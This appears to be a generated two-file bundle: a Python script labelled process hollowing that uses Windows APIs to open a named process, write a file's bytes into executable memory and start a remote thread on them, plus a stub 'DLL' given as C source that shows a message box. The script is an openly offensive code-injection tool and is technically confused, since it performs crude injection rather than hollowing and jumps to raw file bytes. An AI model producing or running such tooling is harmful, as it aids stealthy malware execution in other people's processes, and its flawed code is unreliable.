[
    {
        "file_name": "process_hollowing.py",
        "file_content": "import ctypes\nimport os\nimport sys\nfrom ctypes import wintypes\n\n# Load necessary Windows API functions\nkernel32 = ctypes.WinDLL('kernel32', use_last_error=True)\nntdll = ctypes.WinDLL('ntdll', use_last_error=True)\n\n# Define necessary structures and constants\nPROCESS_ALL_ACCESS = 0x001F0FFF\nTH32CS_SNAPPROCESS = 0x00000002\n\nclass PROCESSENTRY32(ctypes.Structure):\n    _fields_ = [\n        (\"dwSize\", wintypes.DWORD),\n        (\"cntUsage\", wintypes.DWORD),\n        (\"th32ProcessID\", wintypes.DWORD),\n        (\"th32DefaultHeapID\", wintypes.PULONG),\n        (\"th32ModuleID\", wintypes.DWORD),\n        (\"cntThreads\", wintypes.DWORD),\n        (\"th32ParentProcessID\", wintypes.DWORD),\n        (\"pcPriClassBase\", wintypes.LONG),\n        (\"dwFlags\", wintypes.DWORD),\n        (\"szExeFile\", wintypes.CHAR * 260)\n    ]\n\ndef get_process_id_by_name(process_name):\n    \"\"\"Retrieve the process ID of a process by its name.\"\"\"\n    snapshot = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)\n    if snapshot == -1:\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    pe32 = PROCESSENTRY32()\n    pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)\n\n    if not kernel32.Process32First(snapshot, ctypes.byref(pe32)):\n        kernel32.CloseHandle(snapshot)\n        raise ctypes.WinError(ctypes.get_last_error())\n\n    while kernel32.Process32Next(snapshot, ctypes.byref(pe32)):\n        if pe32.szExeFile.decode('utf-8').lower() == process_name.lower():\n            kernel32.CloseHandle(snapshot)\n            return pe32.th32ProcessID\n\n    kernel32.CloseHandle(snapshot)\n    return None\n\ndef open_process(process_id):\n    \"\"\"Open a handle to the target process.\"\"\"\n    return kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, process_id)\n\ndef read_memory(process_handle, base_address, size):\n    \"\"\"Read memory from the target process.\"\"\"\n    buffer = ctypes.create_string_buffer(size)\n    bytes_read = wintypes.SIZE_T(0)\n    if not kernel32.ReadProcessMemory(process_handle, base_address, buffer, size, ctypes.byref(bytes_read)):\n        raise ctypes.WinError(ctypes.get_last_error())\n    return buffer.raw\n\ndef write_memory(process_handle, base_address, data):\n    \"\"\"Write data to the target process memory.\"\"\"\n    bytes_written = wintypes.SIZE_T(0)\n    if not kernel32.WriteProcessMemory(process_handle, base_address, data, len(data), ctypes.byref(bytes_written)):\n        raise ctypes.WinError(ctypes.get_last_error())\n\ndef create_remote_thread(process_handle, start_address, parameter):\n    \"\"\"Create a remote thread in the target process.\"\"\"\n    thread_id = wintypes.DWORD(0)\n    if not kernel32.CreateRemoteThread(process_handle, None, 0, start_address, parameter, 0, ctypes.byref(thread_id)):\n        raise ctypes.WinError(ctypes.get_last_error())\n    return thread_id\n\ndef process_hollowing(target_process_name, dll_path):\n    \"\"\"Perform process hollowing on the target process.\"\"\"\n    target_pid = get_process_id_by_name(target_process_name)\n    if not target_pid:\n        print(f\"Process {target_process_name} not found.\")\n        return\n\n    target_handle = open_process(target_pid)\n    if not target_handle:\n        print(f\"Failed to open process {target_process_name}.\")\n        return\n\n    # Suspend the target process\n    ntdll.NtSuspendProcess(target_handle)\n\n    # Allocate memory in the target process for the new image\n    image_base = ctypes.c_void_p(0)\n    size = os.path.getsize(dll_path)\n    image_base = kernel32.VirtualAllocEx(target_handle, None, size, 0x1000 | 0x2000, 0x40)\n    if not image_base:\n        print(f\"Failed to allocate memory in process {target_process_name}.\")\n        return\n\n    # Write the new image to the allocated memory\n    with open(dll_path, 'rb') as f:\n        data = f.read()\n        write_memory(target_handle, image_base, data)\n\n    # Resume the target process\n    ntdll.NtResumeProcess(target_handle)\n\n    # Create a remote thread to start the new image\n    create_remote_thread(target_handle, image_base, 0)\n\n    print(f\"Process hollowing completed on {target_process_name} with {dll_path}.\")\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 3:\n        print(\"Usage: python process_hollowing.py <target_process_name> <dll_path>\")\n        sys.exit(1)\n\n    target_process_name = sys.argv[1]\n    dll_path = sys.argv[2]\n    process_hollowing(target_process_name, dll_path)"
    },
    {
        "file_name": "target_dll.dll",
        "file_content": "# This file should contain the DLL code you want to inject into the target process.\n# For example, a simple DLL that prints a message box:\n#include <windows.h>\n\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {\n    switch (ul_reason_for_call) {\n        case DLL_PROCESS_ATTACH:\n            MessageBoxA(NULL, \"DLL Injected!\", \"Process Hollowing\", MB_OK);\n            break;\n        case DLL_THREAD_ATTACH:\n        case DLL_THREAD_DETACH:\n        case DLL_PROCESS_DETACH:\n            break;\n    }\n    return TRUE;\n}"
    }
]